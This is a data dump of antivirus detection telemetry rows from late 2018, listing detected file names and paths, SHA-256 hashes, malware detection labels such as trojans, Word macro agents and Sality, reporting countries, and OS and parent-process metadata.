  Row(detection=Row(filename='avscan-20181102-060315-f5299efc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060315-F5299EFC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T18:26:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052500-9d502d55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052500-9D502D55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050600-f5fd068e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050600-F5FD068E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055418-b50b4fda', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055418-B50B4FDA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051138-bf924c87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051138-BF924C87', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055729-26e5e628', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055729-26E5E628', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053439-f6b13157', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053439-F6B13157', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062434-ef69c946', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062434-EF69C946', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T19:15:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051241-e4c55a33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051241-E4C55A33', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T23:56:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060929-d44bac44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060929-D44BAC44', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060105-a7cc67d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060105-A7CC67D8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T19:33:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054801-d4b84fba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054801-D4B84FBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055417-b47c9659', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055417-B47C9659', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062624-31027eee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062624-31027EEE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053705-4d5d9afc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053705-4D5D9AFC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050531-e4ab9b45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050531-E4AB9B45', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050654-1644e14d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050654-1644E14D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050907-658f94d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050907-658F94D6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054424-5332b746', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054424-5332B746', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055444-c497e63b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055444-C497E63B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060106-a8446bc7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060106-A8446BC7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181031-210734-294b91fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210734-294B91FD', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='training operator lama.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\AUDIT\\point 5\\PICTURE TRAINING OPERATOR LAMA\\TRAINING OPERATOR LAMA.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.inf.exe', filepath='E:\\autorun.inf.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe110_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe110 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T06:12:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwha2b5.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHA2B5.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:39:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ok多開器.exe', filepath='C:\\Users\\X\\Downloads\\OKv2 1349\\OK多開器.exe', filesize=1536000, name='HEUR/APC.#M1.#R1'), hash='5260d11003d0bfc913d783d4504f11f914a9fdcdca931faed3a54f82a4c8dc12', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T13:32:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='drevofirmware.exe', filepath='C:\\Program Files (x86)\\Drevo\\Power Console\\TE88_H0.11_S0.44_181031200811\\DrevoFirmware.exe', filesize=2460000, name='TR/Black.Gen2.#M300.#R100338'), hash='19babc94dff2820e1c233422d3b417249dae5dea4f17e35492a97ff805b9edf9', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Drevo\\Power Console\\Drevo.exe', parentsize=151392, timestamp='2018-11-01T14:24:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pddautomationclient.exe', filepath='\\\\?\\D:\\HIS\\PDDAutomation(1397.01.29)(Ver.1.0.0.164)17332\\PDDAutomation(1397.01.29)(Ver.1.0.0.164)17332\\PDDAutomationClient.exe', filesize=832000, name='HEUR/APC.#M1.#R1'), hash='07d91eb66a2dd32de883afd6ebd6bfb390561d690b34a1d996e8a43ff8c629c6', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:33:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe297_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe297 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T13:24:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160058-f40db78f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160058-F40DB78F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hiplifes cool.exe', filepath='D:\\Hiplifes Cool.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T12:26:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:20:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154643-63ffdc19', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154643-63FFDC19', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155302-a3bc5dde', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155302-A3BC5DDE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151845-09a7e517', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151248-D7DE171B\\AVSCAN-20181101-151845-09A7E517', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:37:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154601-5cd45198', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154601-5CD45198', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='depan.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\PKWT\\PKWT 1 TAHUN\\PRINT DEPAN\\DEPAN.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152031-1877f4f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151312-DB3E0F68\\AVSCAN-20181101-152031-1877F4F4', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:44:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='teamviewerqs_pt-idc3mrbjd7.exe', filepath='C:\\Cordilheira_SQL\\Programas\\TeamViewerQS_pt-idc3mrbjd7.exe', filesize=128000, name='W32/Sality.Y.#M1.#R1'), hash='0343a80cf453314f6dd22a88404411b07fd1c4e99d9d305b9439ac14fb2c3d02', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:GYBAjA6bc0S9tnWf.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T10:53:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1959f5297ad155738ad5ad8d3ec060ed9ea071646f091498e2ea46979d3c2796', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\1959F5297AD155738AD5AD8D3EC060ED9EA071646F091498E2EA46979D3C2796', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1959f5297ad155738ad5ad8d3ec060ed9ea071646f091498e2ea46979d3c2796', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:04:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105628-2d2c2eda', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105505-1E1C34B1\\AVSCAN-20181101-105628-2D2C2EDA', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='73636585a3faa3db1560fcb8b8c1f1a7c92c19b14896fa4c6be5ceb417baaf89', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\73636585A3FAA3DB1560FCB8B8C1F1A7C92C19B14896FA4C6BE5CEB417BAAF89', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='73636585a3faa3db1560fcb8b8c1f1a7c92c19b14896fa4c6be5ceb417baaf89', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:05:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='(pc)lborder.html', filepath='d:\\lan games\\warcraft iii\\support\\layout\\(PC)LBorder.html', filesize=19508000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='8e3993d60d2775905a7d3d3358c2d9af4a953429b28a2578fc5c967403134421', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:21:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='driverupdater11027413.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa12696.32216\\driverupdater11027413.exe', filesize=2368000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='780fe49b7b3b5c2f2d55f3d6eb9f521708a1798294766ccda3932c179995c0b1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T20:23:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{AB1AF8A9-4061-43C6-8DD9-5B737E2EC0A7}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='b09f294b94153554821ebe6828724773cdff9520a49a433fd431669c29b8e003', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:00:49Z'), dt=datetime.date(2018, 11, 1)),
